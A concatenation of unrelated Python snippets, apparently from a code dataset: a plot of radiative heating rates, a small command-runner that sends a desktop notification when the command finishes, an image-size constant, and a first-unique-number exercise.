ymax=10
colormap = matplotlib.cm.get_cmap("RdBu_r")
val_min = -4
val_max = 4
zlay=zlay/1000
ax[0].pcolormesh(dates_list, zlay, q_rad_sw, cmap=colormap,vmin=val_min, vmax=val_max)
ax[1].pcolormesh(dates_list, zlay, q_rad_lw, cmap=colormap,vmin=val_min,vmax=val_max)
im = ax[2].pcolormesh(dates_list, zlay, q_rad, cmap=colormap,vmin=val_min, vmax=val_max)
myFmt = mdates.DateFormatter('%-H')
for k in range(3):
ax[k].xaxis.set_major_formatter(myFmt)
ax[k].set_ylim([0,ymax])
for k in range(3):
ticks = ax[k].get_xticks()
ax[k].set_xticks(np.linspace(ticks[0], mdates.date2num(mdates.num2date(ticks[-1])), 4))
ax[1].tick_params(labelleft=False)
ax[2].tick_params(labelleft=False)
cb = fig.colorbar(im, ax=ax[2], extend="both")
cb.ax.set_ylabel('Heating Rate (K/day)')
fig.savefig('../Figures/Fig4_Diurnal_composite.jpg')
plot_diurnal_cycle(sonde_profiles)
|
#!/usr/bin/python
"""
notifyMe: allows the user to execute a program
and when it ends show up a dialog with a title and message
in order to notify that it is ended.
"""
__author__ = "Alessandro Pischedda"
__email__ = "alessandro.pischedda@gmail.com"
import sys
from subprocess import call
def setup_pynotify():
if not pynotify.init("NotifyMe"):
sys.exit(1)
def notifier(title, message):
n = pynotify.Notification(opts['title'], msg)
n.show()
return notifier
def setup_gntp():
def notifier(_title, message):
gntp.notifier.mini(
title=u"{0}".format(_title),
description=u"{0}".format(message),
applicationName=u"NotifyMe"
)
return notifier
try:
import pynotify
notifier = setup_pynotify()
except ImportError:
print "Library pynotify missing"
print "trying to import gntp (Growl Notifications)"
try:
import gntp.notifier
notifier = setup_gntp()
except ImportError:
print "Unable to import gntp, exiting"
sys.exit(-1)
try:
from argparse import ArgumentParser, RawDescriptionHelpFormatter
except ImportError:
print "Library argparse missing"
sys.exit(-1)
def options():
# set the option and help
epilog = '''\
Note:
Every options need an argument between the \"\" if the argument is
composed by more than 1 word.
EXAMPLE if the title is Super Urgent Data you need to type :
python notifyMe.py -t \"Super Urgent Data\" -e \"ls -l\".
This is necessary even for the -e and -m options, if the argument
is composed by just one element you can ignore the \"\".
Mandatory Options:
The option -e is mandatory.'''
# the RawDescriptionHelpFormatter is used to show the epilog has I want
parser = ArgumentParser(epilog=epilog, formatter_class=RawDescriptionHelpFormatter,version="%prog 0.9")
parser.add_argument("-t", "--title",
default="",
metavar="\"TITLE\"",
dest="title",
help="specify the title in the notification bar, "
"by default the title will be empty")
parser.add_argument("-m", "--message",
metavar="\"MESSAGE\"",
dest="message", default="Terminated",
help="specify the message to be showed in the notification bar "
"by default is \"Terminated\"")
parser.add_argument("-T", "--timeit", dest="timeit", action="store_true",
help="time the command to be executed")
parser.add_argument("-e", "--execute", dest="command",
metavar="\"COMMAND\"",
help="the command to be executed, "
"remember to type the options for the command."
" This option is mandatory.")
args = parser.parse_args()
# make options as a dictionary
opts = args.__dict__
if opts['command'] is None:
parser.error("Missing the option -e, it is mandatory.")
return opts
if __name__ == "__main__":
opts = options()
if opts['timeit'] is not None:
import timeit
cmd = opts['command']
fun = "call('%s', shell=True)" % cmd
setup = "from subprocess import call"
avg = timeit.timeit(stmt=fun, setup=setup, number=1)
msg = "%s\ntime: %s" % (opts['message'], avg)
else:
# execute the command and wait until it is finished
call(opts['command'], shell=True)
msg = opts['message']
notifier(opts['title'], msg)
|
IMAGE_SIZE = 128
|
a=int(input())
n=list(map(int,input().split()))
for x in n:
if n.count(x)==1:
print(x)
break
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.